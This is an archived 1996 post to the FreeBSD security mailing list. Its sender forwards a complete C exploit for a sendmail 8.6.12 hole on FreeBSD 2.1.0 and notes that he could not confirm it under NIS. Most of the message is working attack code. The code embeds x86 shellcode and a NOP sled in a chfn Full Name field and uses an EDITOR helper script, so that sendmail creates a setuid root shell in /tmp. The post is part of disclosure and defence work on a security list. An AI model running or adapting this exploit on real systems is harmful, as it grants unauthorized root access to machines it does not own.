Date: Fri, 27 Sep 1996 01:24:28 +0200 From: Stefan Zehl <sec@wg.camelot.de> To: security@freebsd.org Subject: Re: Exploit for sendmail security hole (version 8.6.12 for FreeBSD Message-ID: <199609262324.BAA24530@matrix.wg.camelot.de>
next in thread | raw e-mail | index | archive | help
I could not confirm the following for FreeBSD2.1.0R while running NIS,
i will try on a non-NIS machine tomorrow, but i think it might be
of interest anyway :)
: /* Hi ! */
: /* This is exploit for sendmail bug (version 8.6.12 for FreeBSD 2.1.0). */
: /* If you have any problems with it, send letter to me. */
: /* Have fun ! */
: /* ----------------- Dedicated to my beautiful lady ------------------ */
: /* Leshka Zakharoff, 1996. E-mail: leshka@chci.chuvashia.su */
: #include <stdio.h>
: main()
: {
: void make_files();
: make_files();
: system("EDITOR=./hack;export EDITOR;chmod +x hack;chfn;/usr/sbin/sendmail;echo See result in /tmp");
: }
: void make_files()
: {
: int i,j;
: FILE *f;
: char nop_string[200];
: char code_string[]=
: {
: "\xeb\x50" /* jmp cont */
: /* geteip: */ "\x5d" /* popl %ebp */
: "\x55" /* pushl %ebp */
: "\xff\x8d\xc3\xff\xff\xff" /* decl 0xffffffc3(%ebp) */
: "\xff\x8d\xd7\xff\xff\xff" /* decl 0xffffffd7(%ebp) */
: "\xc3" /* ret */
: /* 0xffffffb4(%ebp): */ "cp /bin/sh /tmp"
: /* 0xffffffc3(%ebp): */ "\x3c"
: "chmod a=rsx /tmp/sh"
: /* 0xffffffd7(%ebp): */ "\x01"
: "-leshka-leshka-leshka-leshka-" /* reserved */
: /* cont: */ "\xc7\xc4\x70\xcf\xbf\xef" /* movl $0xefbfcf70,%esp */
: "\xe8\xa5\xff\xff\xff" /* call geteip */
: "\x81\xc5\xb4\xff\xff\xff" /* addl $0xb4ffffff,%ebp */
: "\x55" /* pushl %ebp */
: "\x55" /* pushl %ebp */
: "\x68\xd0\x77\x04\x08" /* pushl $0x80477d0 */
: "\xc3" /* ret */
: "-leshka-leshka-leshka-leshka-" /* reserved */
: "\xa0\xcf\xbf\xef"
: };
: j=269-sizeof(code_string);
: for(i=0;i<j;nop_string[i++]='\x90');
: nop_string[j]='\0';
: f=fopen("user.inf","w");
: fprintf(f,"#Changing user database information for leshka\n");
: fprintf(f,"Shell: /usr/local/bin/bash\n");
: fprintf(f,"Location: \n");
: fprintf(f,"Office Phone: \n");
: fprintf(f,"Home Phone: \n");
: fprintf(f,"Full Name: %s%s\n",nop_string,code_string);
: fclose(f);
: f=fopen("hack","w");
: fprintf(f,"cat user.inf>\"$1\"\n");
: fprintf(f,"touch -t 2510711313 \"$1\"\n");
: fclose(f);
: }
CU,
Sec
--
Jeder Tag an dem du nicht lächelst, ist ein verlorener Tag. (C. Chaplin)
Hiroshima '45 Tsjernobyl '86 Windows '95
Black holes are where GOD is dividing by zero
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?199609262324.BAA24530>